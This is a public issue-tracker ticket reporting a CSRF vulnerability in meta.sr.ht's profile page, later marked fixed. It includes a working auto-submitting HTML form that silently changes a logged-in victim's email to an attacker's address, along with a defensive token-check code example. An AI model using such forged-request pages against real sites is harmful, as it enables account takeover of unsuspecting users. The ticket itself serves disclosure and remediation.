~sircmpwn/meta.sr.ht#69: Security: Vulnerable to Cross-site Request Forgery (CSRF)

The website is vulnerable to cross-site request forgery (CSRF). Attackers can host the following HTML to force a user into changing their email address to an attacker's email address.

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://meta.sr.ht/profile" method="POST">
      <input type="hidden" name="email" value="attacker&#64;example&#46;com" />
      <input type="hidden" name="url" value="" />
      <input type="hidden" name="location" value="" />
      <input type="hidden" name="bio" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Once a user that is logged in visits the page, a POST request is made to modify their email address. The attacker then receives a confirmation email and can now perform a password reset. The request above is just an example, but it will apply to any state-changing request.

Feel free to ping me if you have any other questions.

Resources: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
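One way to close this class of bug, as an added example that is not sr.ht's own code, is the synchronizer token pattern from the linked OWASP cheat sheet: each session gets a random token that the profile form must echo back, compared in constant time, with an Origin/Referer check as defence in depth. The `_csrf_token` field name, the `https://meta.sr.ht` origin and the dicts standing in for the framework's session, form and headers are assumptions.

```python
# Added example, not sr.ht's code: synchronizer-token check for a state-changing
# POST such as the /profile form. Dicts stand in for the framework's session,
# form and headers; the field name and origin are assumptions.
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://meta.sr.ht"  # assumed deployment origin
TOKEN_FIELD = "_csrf_token"         # assumed hidden-field and session key

def issue_csrf_token(session: dict) -> str:
    """Mint one unguessable token per session; the real profile template embeds
    it as <input type="hidden" name="_csrf_token" value="...">."""
    session[TOKEN_FIELD] = secrets.token_urlsafe(32)
    return session[TOKEN_FIELD]

def origin_allowed(headers: dict) -> bool:
    """Defence in depth: a form auto-submitted from another site arrives with
    that site's Origin (or Referer). Absent headers pass; the token decides."""
    for name in ("Origin", "Referer"):
        if headers.get(name):
            parts = urlsplit(headers[name])
            return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN
    return True

def csrf_valid(session: dict, form: dict, headers: dict) -> bool:
    """Token must exist in both session and form and match in constant time."""
    expected, submitted = session.get(TOKEN_FIELD, ""), form.get(TOKEN_FIELD, "")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode()) and \
        origin_allowed(headers)

def handle_profile_post(session: dict, form: dict, headers: dict) -> bool:
    """Apply the email change only after the CSRF check; False means answer 403."""
    if not csrf_valid(session, form, headers):
        return False
    session["profile"]["email"] = form["email"]
    return True

def demo() -> tuple:
    """Constructed victim session: the ticket's forged POST (no token, foreign
    Origin) is refused; the same fields plus the page's own token are accepted."""
    session = {"profile": {"email": "victim@example.com"}}
    forged = {"email": "attacker@example.com", "url": "", "location": "", "bio": ""}
    forged_ok = handle_profile_post(session, forged, {"Origin": "https://evil.example"})
    genuine = dict(forged, email="new@example.com")
    genuine[TOKEN_FIELD] = issue_csrf_token(session)
    genuine_ok = handle_profile_post(session, genuine, {"Referer": SITE_ORIGIN + "/profile"})
    return forged_ok, genuine_ok, session["profile"]["email"]
```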

Status: RESOLVED FIXED
Submitter: ~alxjsn
Assigned to: No-one
Submitted: 6 years ago
Updated: 6 years ago
Labels: No labels applied.

~sircmpwn 6 years ago

Thank you. In the future, send security-related issues as an email, not as a public ticket.

~alxjsn 6 years ago

Sorry about that. Feel free to remove this ticket then.

~sircmpwn 6 years ago

I have disabled this feature in meta.sr.ht in production for now; a proper fix will follow shortly.

~sircmpwn REPORTED FIXED 6 years ago
